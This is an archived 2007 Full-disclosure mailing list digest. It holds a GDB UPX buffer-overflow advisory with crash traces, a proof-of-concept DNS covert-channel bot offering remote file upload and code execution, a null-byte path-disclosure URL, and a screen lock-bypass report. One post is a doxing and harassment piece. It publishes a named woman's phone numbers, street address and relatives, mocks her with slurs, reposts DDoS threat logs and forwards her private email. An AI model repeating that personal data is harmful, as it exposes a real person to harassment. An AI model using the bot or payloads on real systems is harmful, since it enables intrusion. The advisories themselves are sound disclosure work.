Source: http://piotrbania.com/all/ti89/dis1.c
Binary: http://piotrbania.com/all/ti89/dis1.89z

Dis2:
Source: http://piotrbania.com/all/ti89/dis2.c
Binary: http://piotrbania.com/all/ti89/dis2.89z

i hope you will find them somehow interesting.

best regards,
pb

--
--------------------------------------------------------------------
Piotr Bania - - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33
http://www.piotrbania.com - Key ID: 0xBE43AC33
--------------------------------------------------------------------

- "The more I learn about men, the more I love dogs."

From xwings at security.net.my Sat Jun 2 18:48:03 2007
From: xwings at security.net.my (xWinGs)
Date: Sun, 3 Jun 2007 01:48:03 +0800
Subject: [Full-disclosure] SNMY200706_01 : GBD UPX File Handling Buffer Overflow Vulnerability
Message-ID: <200706030148.03485.xwings@security.net.my>

Title                    : GBD UPX File Handling Buffer Overflow Vulnerability
security.net.my Advisory : SNMY200706_01
Release Date             : 2007-06-02
Last Update              : 2007-06-02
Critical                 : Low
Impact                   : System access
Where                    : From Local
Solution Status          : None
Software                 : GDB 6.6 and above
CVE reference            : None
Related Files            : http://blog.xwings.net/?p=71

****************************************************
** Description :
****************************************************

A vulnerability has been reported in GDB, which possible exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error in "coffread.c" when unpacking executable files compressed with UPX. This can be exploited to cause a buffer overflow and potentially allows arbitrary code execution via a specially-crafted UPX packed file.

The vulnerability has been reported in versions 6.6 till the latest CVS.

****************************************************
** Provided and/or discovered by :
****************************************************

Discovered by KaiJern, Lau. (xwingssecuritynetmy)

****************************************************
** Changelog:
****************************************************

2006-01-13: Updated advisory with information from 3Com's Zero Day Initiative.
2006-01-17: Added link to US-CERT vulnerability note.

****************************************************
** Crashing GDB :
****************************************************

$ file gdbupx
gdbupx: MS-DOS executable PE for MS Windows (console) Intel 80386 32-bit, UPX compressed

$ upx -d gdbupx
Ultimate Packer for eXecutables
Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006
UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006

File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: gdbupx: CantUnpackException: exe header corrupte.e

Unpacked 0 files.

$ gdb -v
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".

$ gdb gdbtest/bin/gdb
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
Using host libthread_db library "/lib/libthread_db.so.1".
Really redefine built-in command "frame"? (y or n) [answered Y; input not from terminal]
Really redefine built-in command "thread"? (y or n) [answered Y; input not from terminal]
Really redefine built-in command "start"? (y or n) [answered Y; input not from terminal]
gdb>r gdbupx
GNU gdb 6.6.50.20070531-cvs
Copyright (C) 2007 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...

Program received signal SIGSEGV, Segmentation fault.
_______________________________________________________________________________
eax:08334F70 ebx:00000000 ecx:08337168 edx:082C3240 eflags:00210246
esi:0833D320 edi:0833D34C esp:BF8E54D0 ebp:BF8E54F8 eip:0814CD82
cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B o d I t s Z a P c
[007B:BF8E54D0]---------------------------------------------------------[stack]
BF8E5500 : 80 02 00 00 00 00 00 00 - FC 01 00 00 00 00 00 00 ................
BF8E54F0 : 30 00 00 00 F0 55 8E BF - 38 56 8E BF 50 D7 14 08 0....U..8V..P...
BF8E54E0 : 68 71 33 08 F4 BD 2E 08 - F0 55 8E BF 00 00 00 00 hq3......U......
BF8E54D0 : 31 2D 25 08 FF FF FF FF - F8 54 8E BF 7D C0 14 08 1-%......T..}...
[007B:0833D320]---------------------------------------------------------[ data]
0833D320 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
0833D330 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
[0073:0814CD82]---------------------------------------------------------[ code]
0x814cd82 : movzx eax,BYTE PTR [ebx]
0x814cd85 : cmp al,BYTE PTR [edx+24]
0x814cd88 : mov BYTE PTR [esi+12],0x1
0x814cd8c : mov DWORD PTR [esp+12],ecx
0x814cd90 : sete al
0x814cd93 : movzx eax,al
------------------------------------------------------------------------------
0x0814cd82 in process_coff_symbol (cs=0xbf8e55f0, aux=0x82ebdf4, objfile=0x8337168) at coffread.c:1482
1482 name = EXTERNAL_NAME (name, objfile->obfd);
gdb>bt
#0 0x0814cd82 in process_coff_symbol (cs=0xbf8e55f0, aux=0x82ebdf4, objfile=0x8337168) at coffread.c:1482
#1 0x0814d750 in coff_symfile_read (objfile=0x8337168, mainline=0x1) at coffread.c:1084
#2 0x08108ff3 in syms_from_objfile (objfile=0x8337168, addrs=0x833e280, offsets=0x0, num_offsets=0x0, mainline=0x1, verbo=0x0) at symfile.c:876
#3 0x081093de in symbol_file_add_with_addrs_or_offsets (abfd=0x8334f70, from_tty=0x0, addrs=0x0, offsets=0x0, num_offsets=0x0, mainline=0x1, flags=0x0) at symfile.c:988
#4 0x0810a265 in symbol_file_add_main_1 (args=0x8334f70 "\001", from_tty=0x82c3240, flags=) at symfile.c:1121
#5 0x08121b92 in catch_command_errors (command=0x810a3f0 , arg=0xbf8e72ad "../../gdbupx", from_tty=0x0, mask=0x6) at exceptions.c:530
#6 0x0807eb38 in captured_main (data=0xbf8e58f4) at .././gdb/main.c:728
#7 0x08121c2b in catch_errors (func=0x807e1e0 , func_args=0xbf8e58f4, errstring=0x8252d31 "", mask=0x6) at exceptions.c:515
#8 0x0807e193 in gdb_main (args=0xbf8e58f4) at .././gdb/main.c:881
#9 0x0807e155 in main (argc=0x0, argv=0x8332df0) at gdb.c:35

****************************************************
** Thanks To :
****************************************************

i. BSDaemon @ kernelhacking.com
ii. RedDragon @ thc
iii. Committee Members of hackinthebox.org
iv. pulltheplug.org

--
--
Regards,
xWinGs aka KJ, Lau
==
All good things ... come by grace, and grace come by art, and art does not come easy.
** From : xwings (at) security (dot) net (dot) my

From xwings at security.net.my Sat Jun 2 18:51:56 2007
From: xwings at security.net.my (xWinGs)
Date: Sun, 3 Jun 2007 01:51:56 +0800
Subject: [Full-disclosure] RESEND new Copy : SNMY200706_01 : GBD UPX File Handling Buffer Overflow Vulnerability
Message-ID: <200706030151.56513.xwings@security.net.my>

Title                    : GBD UPX File Handling Buffer Overflow Vulnerability
security.net.my Advisory : SNMY200706_01
Release Date             : 2007-06-02
Last Update              : 2007-06-02
Critical                 : Low
Impact                   : System access
Where                    : From Local
Solution Status          : None
Software                 : GDB 6.6 and above
CVE reference            : None
Related Files            : http://blog.xwings.net/?p=71

****************************************************
** Description :
****************************************************

A vulnerability has been reported in GDB, which possible exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error in "coffread.c" when unpacking executable files compressed with UPX. This can be exploited to cause a buffer overflow and potentially allows arbitrary code execution via a specially-crafted UPX packed file.

The vulnerability has been reported in versions 6.6 till the latest CVS.

****************************************************
** Provided and/or discovered by :
****************************************************

Discovered by KaiJern, Lau. (xwingssecuritynetmy)

****************************************************
** Changelog:
****************************************************

2007-06-02: Bug being published.

****************************************************
** Crashing GDB :
****************************************************

$ file gdbupx
gdbupx: MS-DOS executable PE for MS Windows (console) Intel 80386 32-bit, UPX compressed

$ upx -d gdbupx
Ultimate Packer for eXecutables
Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006
UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006

File size Ratio Format Name
-------------------- ------ ----------- -----------
upx: gdbupx: CantUnpackException: exe header corrupte.e

Unpacked 0 files.

$ gdb -v
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".

$ gdb gdbtest/bin/gdb
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
Using host libthread_db library "/lib/libthread_db.so.1".
Really redefine built-in command "frame"? (y or n) [answered Y; input not from terminal]
Really redefine built-in command "thread"? (y or n) [answered Y; input not from terminal]
Really redefine built-in command "start"? (y or n) [answered Y; input not from terminal]
gdb>r gdbupx
GNU gdb 6.6.50.20070531-cvs
Copyright (C) 2007 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...

Program received signal SIGSEGV, Segmentation fault.
_______________________________________________________________________________
eax:08334F70 ebx:00000000 ecx:08337168 edx:082C3240 eflags:00210246
esi:0833D320 edi:0833D34C esp:BF8E54D0 ebp:BF8E54F8 eip:0814CD82
cs:0073 ds:007B es:007B fs:0000 gs:0033 ss:007B o d I t s Z a P c
[007B:BF8E54D0]---------------------------------------------------------[stack]
BF8E5500 : 80 02 00 00 00 00 00 00 - FC 01 00 00 00 00 00 00 ................
BF8E54F0 : 30 00 00 00 F0 55 8E BF - 38 56 8E BF 50 D7 14 08 0....U..8V..P...
BF8E54E0 : 68 71 33 08 F4 BD 2E 08 - F0 55 8E BF 00 00 00 00 hq3......U......
BF8E54D0 : 31 2D 25 08 FF FF FF FF - F8 54 8E BF 7D C0 14 08 1-%......T..}...
[007B:0833D320]---------------------------------------------------------[ data]
0833D320 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
0833D330 : 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................
[0073:0814CD82]---------------------------------------------------------[ code]
0x814cd82 : movzx eax,BYTE PTR [ebx]
0x814cd85 : cmp al,BYTE PTR [edx+24]
0x814cd88 : mov BYTE PTR [esi+12],0x1
0x814cd8c : mov DWORD PTR [esp+12],ecx
0x814cd90 : sete al
0x814cd93 : movzx eax,al
------------------------------------------------------------------------------
0x0814cd82 in process_coff_symbol (cs=0xbf8e55f0, aux=0x82ebdf4, objfile=0x8337168) at coffread.c:1482
1482 name = EXTERNAL_NAME (name, objfile->obfd);
gdb>bt
#0 0x0814cd82 in process_coff_symbol (cs=0xbf8e55f0, aux=0x82ebdf4, objfile=0x8337168) at coffread.c:1482
#1 0x0814d750 in coff_symfile_read (objfile=0x8337168, mainline=0x1) at coffread.c:1084
#2 0x08108ff3 in syms_from_objfile (objfile=0x8337168, addrs=0x833e280, offsets=0x0, num_offsets=0x0, mainline=0x1, verbo=0x0) at symfile.c:876
#3 0x081093de in symbol_file_add_with_addrs_or_offsets (abfd=0x8334f70, from_tty=0x0, addrs=0x0, offsets=0x0, num_offsets=0x0, mainline=0x1, flags=0x0) at symfile.c:988
#4 0x0810a265 in symbol_file_add_main_1 (args=0x8334f70 "\001", from_tty=0x82c3240, flags=) at symfile.c:1121
#5 0x08121b92 in catch_command_errors (command=0x810a3f0 , arg=0xbf8e72ad "../../gdbupx", from_tty=0x0, mask=0x6) at exceptions.c:530
#6 0x0807eb38 in captured_main (data=0xbf8e58f4) at .././gdb/main.c:728
#7 0x08121c2b in catch_errors (func=0x807e1e0 , func_args=0xbf8e58f4, errstring=0x8252d31 "", mask=0x6) at exceptions.c:515
#8 0x0807e193 in gdb_main (args=0xbf8e58f4) at .././gdb/main.c:881
#9 0x0807e155 in main (argc=0x0, argv=0x8332df0) at gdb.c:35

****************************************************
** Thanks To :
****************************************************

i. BSDaemon @ kernelhacking.com
ii. RedDragon @ thc
iii. Committee Members of hackinthebox.org
iv. pulltheplug.org

--
--
Regards,
xWinGs aka KJ, Lau
==
All good things ... come by grace, and grace come by art, and art does not come easy.
** From : xwings (at) security (dot) net (dot) my

From fosforo at gmail.com Sun Jun 3 16:59:31 2007
From: fosforo at gmail.com (Fábio Martins a.k.a Fósforo)
Date: Sun, 3 Jun 2007 12:59:31 -0300
Subject: [Full-disclosure] FoFuS - PoC bot using DNS cover channel
Message-ID: <6e285e810706030859t61d8f8fcgf846ba0020f26a1c@mail.gmail.com>

I haven't seen a bot using dns covert channel, so i've tried to create one.
client poorly written in assembly 32 bits and server poorly written in perl.

given a list of public domains extracted from http://freedns.afraid.org/ the bot tries to contact his master and after a very simple challenge (xor/sub/add) the master can ask for system version, submit files, and code execution (maximum of 399 bytes) - with only dns packets.

to test it, need to create a subdomain at freedns.afraid and a machine listening on port 53 to where the server answer requests.

http://fosforo.sytes.net/FoFuS_PoC_bot_beta2.tar.gz

[]s

--
----------------------------------------------------------------------------
Fósforo
Blog: http://insanenetworks.blogspot.com
----------------------------------------------------------------------------
Bcz sex is like hacking.. you get in, you get out, and you hope you didn't leave something behind that can be traced back to you..
---------------------------------------------------------------------------- From lolcommawhat at googlemail.com Sun Jun 3 22:20:18 2007 From: lolcommawhat at googlemail.com (Joseph Evers) Date: Sun, 3 Jun 2007 17:20:18 -0400 Subject: [Full-disclosure] apryl maynard, internet humanitarian Message-ID: <9178da530706031420h324960b9w2f69b047c6473d33@mail.gmail.com> Now this is a story all about how Apryl's life got flipped, turned upside down and I'd like to take a minute to tell you a tale of how this fat lesbian WEB DESIGNER failed Wetwork: Apryl Maynard, daughter of Robin and John (deceased) birthday: april 12, 1979 lj: wetwork.livejournal.com myspace: myspace.com/cloudmerchant her phone numbers: (905) 347-2005 (primary #) (905) 680-1532 Address: 221 Mary Street Thorold, Ontario L2V1J7 Canadia ex-girlfriend darci: myspace.com/pixiestikgirl The story, briefly, is as follows: A 20-year old girl, Krystle Lynn Babin, known on livejournal as sad_little_scar and miss_aveline, committed suicide on September 27th 2006. In the spring of 2007 this was mentioned by one of the deceased's acquaintances on the journal of lj user get_therapy. As several EDiots seem to hang around said troll journal, a typical Encyclopedia Dramatica article was soon written mocking the deceased, in particular her disturbing publicly-posted nudes, which included bondage and in-use tampons. Several people including lj users wetwork and medeanyxgray became irate and began pulling rudimentary personal info and cursing about the great evil which the internet had wrought, while demonstrating their moral superiority by seeking out Krystle's parents and showing them the article. Wetwork was suspended temporarily from lj for the well-thought-out act of posting this info publicly on a website which explicitly forbids it. Wetwork repeatedly complained to and threatened Encyclopedia Dramatica and the author of the article, and eventually orchestrated a DDoS attack, forcing the article to be removed. 
Proof of responsibility for some type of prank directed against her became a requirement for speaking on the ED IRC channel. Her website was soon "down for repairs" indefinitely, and many of her recent posts make angst-ridden references to having lost friends and to "something very strange" going on. Her threats of "utter ruin" have so far proven to be entirely empty, unless they were meant to be threatening to ruin her own life. The following emails between her and a furry known as Leam, among many others equally threatening on her part, ensued. Starting with the most recent: Apryl, I just saw the Arbchat logs and I don't know what to say. I was actually trying to work with one of the "nice" sysops (who was present) there to at least get some of the contact info removed... and then you threatened the wolves in their den. There isn't a thing that can be done /now/ to reduce the amount of information in the article for 6 months, at least (until they forget about the article). You also, for whatever reason, appeared to coordinate a DDoS attack on colo4dallas? "04:15:12 PM OVERLOAD: I'll contact colo4dallas again and let them know we have no co-operation from you 04:16:19 PM OVERLOAD: ok we're gonna play a little game 04:17:05 PM OVERLOAD: gonna msg a few people as well who want this page gone 04:17:16 PM OVERLOAD: you will see 04:18:35 PM OVERLOAD: yah go connect to your page now assholes. 
we'll see how long colo4dallas puts up with this b4 they term your ass and u can have fun finding another provider 04:19:16 PM OVERLOAD: we'll see whos a fag when you have no provider 04:19:23 PM OVERLOAD: and colo4dallas terms your asses 04:19:30 PM OVERLOAD: u think its a joke now but you'll see 04:19:57 PM OVERLOAD: lol goto efnet bitches plenty of kiddies on there to play with your site 04:20:12 PM OVERLOAD: you shit is done, remove the page or it can stay down 04:20:49 PM OVERLOAD: have fun newbs, colo4dallas will be contact again and we'll see how happy they are about your site being the cause of their outtages 04:20:57 PM OVERLOAD: im sure other customers will be quite happy too 04:21:33 PM OVERLOAD: have fun newbs im out, but last warning remove shit or your site can stay down" Why didn't you listen? Why did you charge in, guns blazing? What did you have to gain by doing so? I was right about everything in regards to international law, copyright, and now you're trying to get an international hosting account suspended without going through the normal ToS channels AND threatening them AND launching or at least coordinating a denial-of-service attack? That causes real damage to sites other than ED, and you need to remember that. But I suppose like with everything else, you'll learn the hard way. I sincerely hope that the crimes you committed aren't felonious. Please, reconsider your threats and make amends, before this spirals too far out of control. WETWORK SAYS: i want to reiterate what i've been saying this whole time: all i did was find this kid's information and pass it along to miss_aveline's parents. do you understand that? if shit is happening to [name alert], that's his problem. and the information i found was available on google. anyone could have found it. i am not responsible for any of the things you guys seem to think i'm doing. period. i have a life that is a little bit too full to have time for shit like this. 
and i can't make anything stop [note: she was never asked to make anything stop] because i don't know who's doing it. i don't have any way to contact any of these people -- they are angry friends of a dead girl that you guys are making fun of.. i can't control that. the only person who can is [name alert]. take down the article and everything stops. that's all i can suggest. and, for the record? i didn't even know the girl. i am very sorry she died but it's not going to upset me to hear voicemail directed to a dead girl. i got involved because i know someone who knew her and that's all there is to it. i sent brendan's information to the parents of the girl he's mocking and that was it. now ask yourself: if i didn't know miss_aveline, never met her in my life, why would i be wasting my time causing all these problems for some kid in [location alert]? it doesn't make a whole lot of sense, does it? that's probably because i'm not doing anything to him. and i don't know who is. but you know, i don't feel sorry for him. or his crazy friends. if he has sociopathic tendencies, he needs help. and everything i've seen of him so far screams sociopath. why are you even friends with him? you seem like a reasonable sort. i'm totally bewildered by this. again, i urge you to remove yourself from the situation. when someone bumps me, i bump back, and you guys don't know who you're dealing with. doesn't that seem a little worrisome? the repercussions of his actions may not be immediately obvious but brendan is in for a world of trouble in the very near future. [note: no world of trouble has actually materialized.] and no, that is not a physical threat. i'm 5'6" and haven't been in a fight since fifth grade. LEAM: Apryl, it isn't about Jazzriff now, or even about Miss_aveline; it's been well-established that there isn't any legal recourse against Jazzriff, and the article was already removed. Nothing has happened or is happening to him. 
This is about what you have done to Encyclopedia Dramatica, now. >From your tone, I can tell that was you in Arbchat, and your connection information will no doubt confirm it. You set off a denial-of-service attack on Dreamhost and outright admitted to it. Please don't insult my intelligence by trying to deny it now. To use a gun metaphor, you can't say you're not responsible for where a bullet goes when you pulled the trigger, when you declared your intent and aim. Do you see the hypocricy in calling Jazzriff a sociopath when you are so clearly willing to do the exact same thing? My only involvement in the situation has been to try and get it resolved amicably (my purpose on ED) and to defend my friend; the difference between us is that I am a pacifist. However, all my efforts were clearly in vain. But the matter of your threats against me and even against Jazzriff are really moot, now. WETWORK: i have no idea what a arbchat is -- do you understand that? and i have absolutely no knowledge of how to 'attack' such a thing. the conversation you sent me was grammatically incorrect and full of misspellings. does that really sound like me? bullshit. not even remotely possible. the thing is, a sociopath has issues realizing that there are people around him or her; he/she considers himself/herself to be the only real consciousness on the planet and the rest of the population are bit-players in his/her little play. a sociopath hurts people for his/her own entertainment. who would hurt by removing the article? who would cry over the loss of that horrid piece of trash? calling me a sociopath is laughable. my roommate was involved with miss_aveline for nearly four years. they lived together, shared a bed and made plans for their future. when they broke up, my roommate was utterly destroyed. a few months later, miss_aveline was dead by her own hand. the girl just snapped, broke into pieces and killed herself and it's absolutely impossible to get over that kind of loss. 
i adore my roommate. she is the nicest, sweetest, kindest person i've ever met in my life. she doesn't deserve this. only someone with real issues would hurt a girl who has never hurt anyone in her life. only someone with psychological problems would want to cause pain to a girl who refuses to even utter the word 'hate' because she thinks it's too strong a term. my roommate is being hurt and because i care about her, i will fight to get that piece of trash taken down. i will call in every favor i am owed and again: you do not know who you are messing with or who owes me favors. the article was not removed. it disappears and returns. until i get a formal letter from [name alert] stating the article will be removed and never reposted anywhere on the internet, i will continue my efforts to have it removed. until brendan himself assures me that he will leave miss_aveline's memory alone, i will pursue his utter ruin in every way i know how. but you need to understand (and pass it along to [name alert]'s stupid kindergarten friends) that i am not responsible for anything that has happened thus far. i'm working on a few things but nothing has had any direct effect on [name alert]'s life. whatever he thinks i'm doing, i'm not -- he hasn't seen what i'm up to because what i'm doing takes time. i got a ridiculously funny call today, by the way. some guy said he got my number off craigslist and called to see if i was still interested in 'a firm hand' as he put it. i'm telling you, i laughed so hard after the call that my friend wanted to perform CPR. so thanks to whoever did that -- it really, really brightened my day. 
you take care quotes from ED IRC: 04:15:12 PM OVERLOAD: I'll contact colo4dallas again and let them know we have no co-operation from you 04:16:19 PM OVERLOAD: ok we're gonna play a little game 04:17:05 PM OVERLOAD: gonna msg a few people as well who want this page gone 04:17:16 PM OVERLOAD: you will see 04:18:35 PM OVERLOAD: yah go connect to your page now assholes. we'll see how long colo4dallas puts up with this b4 they term your ass and u can have fun finding another provider 04:19:30 PM OVERLOAD: u think its a joke now but you'll see 04:19:57 PM OVERLOAD: lol goto efnet bitches plenty of kiddies on there to play with your site 04:20:12 PM OVERLOAD: you shit is done, remove the page or it can stay down 04:20:49 PM OVERLOAD: have fun newbs, colo4dallas will be contact again and we'll see how happy they are about your site being the cause of their outtages 04:20:57 PM OVERLOAD: im sure other customers will be quite happy too 04:21:33 PM OVERLOAD: have fun newbs im out, but last warning remove shit or your site can stay down The following message was sent to Apryl Maynard through the intervention of some deeply caring individual. ---------- Forwarded message ---------- From: John Smid, jjsmid at loveinaction.org Date: Mar 21, 2007 10:18 AM Subject: Thank you for writing us To:silverflux.design at gmail.com Apryl, I can certainly understand your struggle, Apryl. I have gone through this myself as a man and have found God's resolution to work the best and bring the greatest rewards. You mentioned that you have "tried" to be with men and have found it not to work. May I bring some perspective to this as I have heard many who have said the same thing that you have. A women [sic] need security, right? She needs safety, right? Well, think about this, you have attempted to engage in one of the most intimate things a human being can do, sexual intimacy. 
This is one of the most vulnerable and unsafe things we can do because of that deep vulnerability that we experience in a sexual encounter with someone. Anytime sex is experienced outside of a committed, trusting, safe marriage there is always the insecurity that the relationship will not last, the person will go with someone else, we are just being used for personal gratification etc. Many people who have struggled with same sex attractions have attempted to solve it by seeing if they can have a successful sexual experience with someone of the opposite sex and in almost every case, the test comes out negative. I truly believe that it is because the "experiment" is just that, using another person's vulnerability to see if I can "do it". This will always end up with a failure due to disappointment, rejection, or just a distaste for what had just occurred. In order for you to really experience the freedom from homosexuality that you are speaking of it takes first of all s surrender to Jesus Christ that abandons all that you are to His word of Truth.  Any sex outside of marriage is unbiblical and will end up with damage ? in every case! This means that regardless of our attractions unless we are married we are called to live a celibate life and find God's grace and joy in that. Secondly, God gives no positive words to us about same sex marriage or relationship. There is nothing in Scripture that alludes to homosexuality being something that He blesses. So marriage means a committed relationship with someone of the opposite sex. Did God make us gay? NO! Sin made us struggle with same sex attractions. The sin of Adam and of those on down the line from him have damaged our world. Our sin continues that in other's lives. We are born into a broken world with all of the effects of sin in our lives and our relationships. God gave us an answer, a resolution, a freedom through the death and resurrection of Jesus Christ. 
His love and mercy offers us forgiveness and restoration from the sin of Adam which brings us into eternity with Him. Many say God doesn't make any junk. There is a truth to that but it doesn't take into consideration the brokenness that we all experience. Are we junk? Certainly not. But we do live in a world that is damaged and at times pretty junky. I have found, Apryl, that when I surrendered my life to Jesus I first of all had answers for the problems that I was encountering. I also found that there was an altar of forgiveness that I could run to when I failed at something. Jesus began to show me that I had a purpose and that He could use my life for His glory. I had talents and gifts that were of value and this went a long way to helping me find a life that was better. God wants to show us a life that is worthy of His calling and that is my prayer for you ? that you will find a life that is worthy of His calling. I pray that you will see that there is so much more of you than same sex attraction. I find men attractive (some men that is). I also make decisions to see them as God sees them. I choose not to see them as objects to gratify my unhealthy desires. I have found men that I really care about and that care about me without compromise and unhealthy things coming into the relationship. This has been so much more rewarding for me than the way that I used to live. I choose not to go back to where I was. Single or married, God's grace is sufficient. Trying out sex to see if it works is taking our lives into our own hands. t is an attempt to control the outcome without seeking God for His provision. Apryl, I hope this gives you some things to think about. Go to this website to find the ministry that might be closest to you in Canada: http://www.exodus.to I love the Lord for He hears my voice. Ps. 116 Rev. John J. Smid President and CEO Love In Action Int'l. Inc. 
4780 Yale Rd., Memphis, TN 38128 Phone: 901-751-2468 www.loveinaction.org In response to my personal two-sentence inquiry as to why she attacked ED and provoked Bantown, I received this bizarre work of fiction: Mr. Evers, Please feel free to assume I made an attack on "Bantown" since that's clearly the popular theory. However, I assure you I have no idea what a Bantown is, where it is, what it's for and how to locate such a thing. I would also be at a loss if asked to describe this attack. I play with Photoshop and write basic HTML for a living -- this does not make me knowledgeable when it comes to attacking things. I have been set up to take the fall for this attack because I disagreed with someone and am now suffering for being honest about my name, telephone number and location. I suspect the individual responsible for what happened is someone that's very annoyed with me or close friends with an acquaintance but I have no idea how to locate this person in order to offer him or her up for sacrifice. If I come by that contact information, please be assured you'll be the first to know. In the meantime, I'm not living at the address posted to my domain registration information, none of the phone calls have bothered me and I am not currently surrounded by ten thousand boxes of aluminum nails. To sum up, none of the efforts made thus far are having much of an effect and I would like to politely request that you rethink the situation before making more mischief for me. Of course, you'll ignore that request. But you and the rest of your legion have yourself a lovely evening. Sincerely, Apryl Maynard -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070603/736ea67a/attachment.html

From rembrandt at jpberlin.de Mon Jun 4 04:36:31 2007
From: rembrandt at jpberlin.de (rembrandt at jpberlin.de)
Date: Mon, 4 Jun 2007 05:36:31 +0200 (CEST)
Subject: [Full-disclosure] screen 4.0.3 local Authentication Bypass
Message-ID: <2337.85.178.82.187.1180928191.squirrel@www.jpberlin.de>

Please take a look at the Attachment dear List moderator. :)

Kind regards,
Rembrandt
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: screen_4.0.3_authentication_bypass_0815.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070604/45e80874/attachment.txt

From kefka at kevinbeardsucks.com Mon Jun 4 05:56:45 2007
From: kefka at kevinbeardsucks.com (kefka)
Date: Mon, 04 Jun 2007 00:56:45 -0400
Subject: [Full-disclosure] Full Path Disclosure eqDKP 1.3.2c and prior
In-Reply-To: <2337.85.178.82.187.1180928191.squirrel@www.jpberlin.de>
References: <2337.85.178.82.187.1180928191.squirrel@www.jpberlin.de>
Message-ID: <46639B8D.1010503@kevinbeardsucks.com>

eqDKP 1.3.2c and prior

'compare' variable reveals the full path because eqdkp fails to properly sanitize user-supplied input

Example: /path-to-eqdkp/listmembers.php?compare=%00

From jim.geovedi at gmail.com Mon Jun 4 08:17:00 2007
From: jim.geovedi at gmail.com (Jim Geovedi)
Date: Mon, 4 Jun 2007 14:17:00 +0700
Subject: [Full-disclosure] BCS'07 Call For Papers
Message-ID: <87d5db160706040017v26ac48dg1f8c6d411d81bd23@mail.gmail.com>

Dear Full Disclosure readers,

The call for papers and conference registration is now open for BCS'07, our third annual information security & hacking conference.

From 30 to 31 October 2007, BCS'07 will be held at the Grand Melia in Jakarta, Indonesia.

We invite proposals for paper presentations and demonstrations:

Your submission should include:

1. Name, title, address, email and phone number
2. Draft of the proposed presentation (in PDF, PowerPoint or Keynote format), proof of concept for tools and exploits, etc.
3. Short biography, qualification, occupation, achievement and affiliations (limit 150 words).
4. Summary or abstract for your presentation (limit 150 words)
5. Time (40-60 minutes). Include time for discussion and questions
6. Technical requirements (video, internet, wireless, audio, etc.)

We do not accept product, service or vendor related presentations.

Please send your proposal to bcs07-cfp at bellua.com as soon as possible and no later than 30 June 2007. Proposals will be evaluated in the order received; submit early to maximise your chances of being selected.

Links: http://www.bellua.net or http://www.bellua.com/bcs/
Pictures from BCS2006: http://www.bellua.net/asia06.pictures/index.html
Pictures from BCS2005: http://www.bellua.net/asia05.pictures/index.html

Many thanks,
Jim Geovedi

From zeroknock at metaeye.org Tue Jun 5 20:36:31 2007
From: zeroknock at metaeye.org (Aditya K Sood)
Date: Tue, 05 Jun 2007 12:36:31 -0700
Subject: [Full-disclosure] Adverse Vectors of Coding in Wordpress : Post Modifications
Message-ID: <4665BB3F.8000800@metaeye.org>

Hi all

This analysis directly or indirectly revolves around the coding of wordpress. In this the stress is being laid on the modification of .php pages present in the wordpress. This issue becomes relevant when the user changes some of the content of base pages to render it according to its own needs.

you can find it at :

http://cera.metaeye.org/wpana.xhtml
http://zeroknock.blogspot.com/2007/06/adverse-vectors-of-coding-in-wordpress.html

Regards
Aditya K Sood
Zerkn0ck
http://www.metaeye.org

From a.klink at cynops.de Mon Jun 4 09:14:58 2007
From: a.klink at cynops.de (Alexander Klink)
Date: Mon, 4 Jun 2007 10:14:58 +0200
Subject: [Full-disclosure] screen 4.0.3 local Authentication Bypass
In-Reply-To: <2337.85.178.82.187.1180928191.squirrel@www.jpberlin.de>
References: <2337.85.178.82.187.1180928191.squirrel@www.jpberlin.de>
Message-ID: <20070604.813591b8d65e87287fd5e77cca351e62@cynops.de>

Hi,

On Mon, Jun 04, 2007 at 05:36:31AM +0200, rembrandt at jpberlin.de wrote:
> It has been tested on OpenBSD 4.1 + screen 4.0.3 on x86.
>
> How to reproduce:
>
> Lock screen using ctrl+x

I guess you mean Ctrl+a+x?

> Choose a Password
> Confirm the Password
>
> Screen asks for a Password to unlock the screen.
